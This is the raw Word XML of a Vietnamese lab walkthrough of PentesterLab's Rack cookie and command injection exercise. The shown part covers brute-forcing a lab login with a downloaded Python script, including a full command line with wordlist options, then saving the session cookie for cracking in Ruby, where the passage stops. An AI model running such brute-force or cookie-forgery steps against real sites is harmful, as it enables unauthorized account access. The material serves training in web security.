    <w:p w14:paraId="06BE4FD7" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bài tập lần này giải thích việc giả mạo crack cookie và chúng ta thậm chí có thể sử đổi cookie đã đăng ký. Sử dụng lỗ hỏng đó chúng ta có thể nâng cao được đặc quyền của mình và nhận được các thực thi lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09A9D2" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Link bài tập: </w:t>
      </w:r>
      <w:hyperlink r:id="rId256" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/rack_cookies_and_commands_injection/course?fbclid=IwAR2ZF0gwSscGd_0_yMA-tZyCJJtzbokxUTSAlxo8FKiIVC7eE5P-nHOY8Tk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63C4B866" w14:textId="0A112984" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bài tập này trình bày chi tiết về việc giả mạo các cookie rack trong một trang web và cách mà chúng ta cũng như là kẻ tấn công có thể sử dụng nó để truy cập vào giao diện quản trị.  Sau đó, sử dụng quyền truy cập này để leo thang nâng cấo đặc quyền, kẻ tấn công cũng như là chúng ta sẽ có thể thực hiện các lệnh trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F727495" w14:textId="37852753" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00A8787C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE31C77" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Cuộc tấn công chia thành 4 bước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7BAEC" w14:textId="6D6902D6" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fingerprinting: để thu thập thông tin về ứng dụng web và các công nghệ đang được sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AEAB1" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Brute force quyền xác thực trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA64FD" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tampering: giả mạo các cookie crack để dành quyền quản trị trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59310BD6" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Từ các trang quản trị, đạt được khả năng thực thi lệnh bằng cách Injection để chạy bất kỳ lệnh nào trên hệ điều hành cơ bản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FE6FC" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00001EA3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bây giờ chúng ta bắt đầu khai thác lỗ hỏng!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D2E03" w14:textId="70136807"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6C6815A6">
          <v:shape id="Picture 63" o:spid="_x0000_i1258" type="#_x0000_t75" style="width:280.5pt;height:83.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId257" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AE21B" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là trang web mà chúng ta sẽ test lỗ hỏng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C112EC6" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên chúng ta đăng nhập tài khoản mật khẩu bất kỳ, ở đây mình sẽ nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C63A1" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C70183" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Password: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5291D941"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Sau đó ta nhấn f12 để vào chế độ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> của chrome xem phiên hoạt động của trang web lưu lại như thế nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40486436" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Vào phần network ở mục login phía dưới cùng ta thấy username và password mà chúng ta đã nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34393E0A" w14:textId="35E83ED9"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32C475CE">
          <v:shape id="Picture 64" o:spid="_x0000_i1259" type="#_x0000_t75" style="width:468pt;height:249.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId258" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="130DD7FB"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Tiếp theo chúng ta kéo lên phía trên và thấy khi không được xác thực đăng nhập vào trang web thì máy chủ sẽ phản hồi chuyển hướng qua trạng thái </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>302 Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15238390" w14:textId="4B0F0608" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00A8787C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="636F975F">
          <v:shape id="Picture 65" o:spid="_x0000_i1260" type="#_x0000_t75" style="width:311.25pt;height:61.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId259" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7AFAD1" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00A8787C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF4CCB0"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Bây giờ chúng ta sẽ sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để crack password trang đăng nhập này nhé!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305D4E96"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Đầu tiên ta cài đặt python ở trang web </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.python.org/downloads/release/python-390/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="069C9162" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bản mới nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F821B9E"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Cài đặt tất cả các thư viện cần thiết </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A4D05"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Pip install request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219A3BD"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Pip install tqdm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB6B4A"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Sau đó chúng ta tải file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>brute-force.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở trang </w:t>
      </w:r>
      <w:hyperlink r:id="rId261" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1p9GK9ieS9ozEbrd_iKdhKxYWjl2MwEgj/view?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="373FE9CC" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau đó mở file bằng phần mềm visual studio code để chạy lệnh python ngay trong phần mền này thông qua terminal có sẵn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F910E0" w14:textId="524D1FAD"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6BD12A35">
          <v:shape id="Picture 66" o:spid="_x0000_i1261" type="#_x0000_t75" style="width:382.5pt;height:214.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId262" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53092C14"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amp; python c:/brute-force.py --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ECD8C7" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là lệnh sẽ show ra chúng ta các gợi ý hổ trợ cú pháp lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16451825"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Trước khi chúng ta bắt đầu </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">brute force </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>bằng các lệnh ta tạo hai file .txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC12B6" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Wordlist.txt chứa các mật khẩu phổ biến nhất mà người dùng thường sử dụng nhất trên thế giới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126D711" w14:textId="5037FFA2" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">File tiếp theo đó là file credentials.txt chứa chứng chỉ bảo mật có nội dung là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A155FE6"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Adminsecretpentesterlabtest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410CC14A"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amp; python c:/brute-force.py http://192.168.75.15/login -f C:\wordlist.txt -u C:\credentials.txt --method POST -l login -p password -t 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FF958" w14:textId="5065FEF4"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7522BAD2">
          <v:shape id="Picture 67" o:spid="_x0000_i1262" type="#_x0000_t75" style="width:468pt;height:36pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId263" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED670D" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tham số -f là quét full danh sách trong file đoán mã mà chúng ta tự tạo sẵn –method POST là sử dụng phương thức POST với tham số -l login và tham số -p password cuối cùng -t là số luồng mà chúng ta muốn tốc độ xử lý nhanh hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239765DF" w14:textId="594F2177"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38A97DE2">
          <v:shape id="Picture 68" o:spid="_x0000_i1263" type="#_x0000_t75" style="width:468pt;height:39pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId264" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BD124" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Và như vậy đã có kết quả thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6602FD3C" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Username: test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9D89E" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Password: test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7EC81" w14:textId="08D7CD29"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641B5D51">
          <v:shape id="Picture 69" o:spid="_x0000_i1264" type="#_x0000_t75" style="width:468.75pt;height:110.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId265" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F8F92B" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi đăng nhập thành công chúng ta sẽ vào được trang web có giao diện như thế này!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B941A"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Khi đã vào được thành công thì chúng ta có thể thấy phần cookie session ở mục Application là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED8D1A" w14:textId="500CF255"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16D6F8A1">
          <v:shape id="Picture 70" o:spid="_x0000_i1265" type="#_x0000_t75" style="width:468pt;height:55.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId266" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AFF41" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta lưu lại cookie vào file cookie.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762F2E29"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Sau đó chúng ta tải và cài đặt ruby để crack cookie qua đường link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId267" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://rubyinstaller.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B0ADB07" w14:textId="431B1CB0"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02E26A78">
          <v:shape id="Picture 71" o:spid="_x0000_i1266" type="#_x0000_t75" style="width:214.5pt;height:166.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId268" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A814009" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau đó ta chạy tiến trình cài đặt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B825E5B"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Sau khi cài xong ta dùng lệnh cmd để cài đặt thêm các gói cần thiết </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A8EAB" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> install bundler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F00625" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
